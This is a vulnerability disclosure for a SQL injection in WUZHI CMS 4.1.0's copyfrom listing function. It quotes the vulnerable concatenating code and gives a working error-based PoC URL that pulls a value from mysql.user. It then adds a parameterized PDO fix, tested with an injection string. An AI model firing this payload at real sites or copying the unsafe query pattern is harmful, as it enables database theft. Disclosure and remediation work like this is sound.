A SQL injection vulnerability was discovered in WUZHI CMS 4.1.0. It allows remote attackers to inject a malicious SQL statement into the server via index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=54&_submenuid=54&keywords={sql payload}
filename
/coreframe/app/admin/copyfrom.php
code
public function listing() {
    $siteid = get_cookie('siteid');
    $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
    $page = max($page, 1);
    if (isset($GLOBALS['keywords'])) {
        $keywords = $GLOBALS['keywords'];
        // $keywords is placed into the WHERE clause without escaping or binding
        $where = "`name` LIKE '%$keywords%'";
    } else {
        $where = '';
    }
    $result = $this->db->get_list('copyfrom', $where, '*', 0, 20, $page);
    $pages = $this->db->pages;
    $total = $this->db->number;
    include $this->template('copyfrom_listing');
}
POC
index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=54&_submenuid=54&keywords=%27+and+updatexml(7,concat(0x7e,(select%20password_last_changed%20from%20mysql.user%20limit%201),0x7e),7)%23
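
The `keywords` filter in `listing()` builds its `LIKE` clause by string concatenation. The following is an added example, not code from WUZHI CMS, showing the same search with the keyword bound as a parameter. It assumes PDO with an in-memory SQLite database as a stand-in for the CMS's own `db` class; `escape_like()` and `list_copyfrom()` are hypothetical helper names, and the rows are constructed sample data.

```php
<?php
// Added example: parameterized form of the keyword search in listing().
// PDO + in-memory SQLite stand in for the CMS's db wrapper (assumption);
// the table and column names (copyfrom, name) follow the code above.

function escape_like(string $s): string
{
    // Escape LIKE wildcards so the keyword is matched literally ('!' is the escape char).
    return strtr($s, ['!' => '!!', '%' => '!%', '_' => '!_']);
}

function list_copyfrom(PDO $pdo, ?string $keywords, int $page = 1, int $pageSize = 20): array
{
    $page = max($page, 1);
    $sql = 'SELECT * FROM copyfrom';
    $bind = [];
    if ($keywords !== null && $keywords !== '') {
        // The keyword travels as a bound value, never as part of the SQL text.
        $sql .= " WHERE name LIKE :kw ESCAPE '!'";
        $bind[':kw'] = '%' . escape_like($keywords) . '%';
    }
    $sql .= ' ORDER BY id LIMIT :lim OFFSET :off';
    $stmt = $pdo->prepare($sql);
    foreach ($bind as $name => $value) {
        $stmt->bindValue($name, $value, PDO::PARAM_STR);
    }
    $stmt->bindValue(':lim', $pageSize, PDO::PARAM_INT);
    $stmt->bindValue(':off', ($page - 1) * $pageSize, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE copyfrom (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO copyfrom (name) VALUES ('Reuters'), ('AP News'), ('100% Local')");

// A normal keyword, a keyword containing quote characters, and a bare wildcard.
foreach (['News', "' OR '1'='1", '%'] as $kw) {
    $rows = list_copyfrom($pdo, $kw);
    printf("%-16s -> %d row(s)\n", var_export($kw, true), count($rows));
}
```

Because the quote characters arrive as data, the second input is searched for as a literal string instead of altering the `WHERE` clause, and the bare `%` only matches names that actually contain a percent sign.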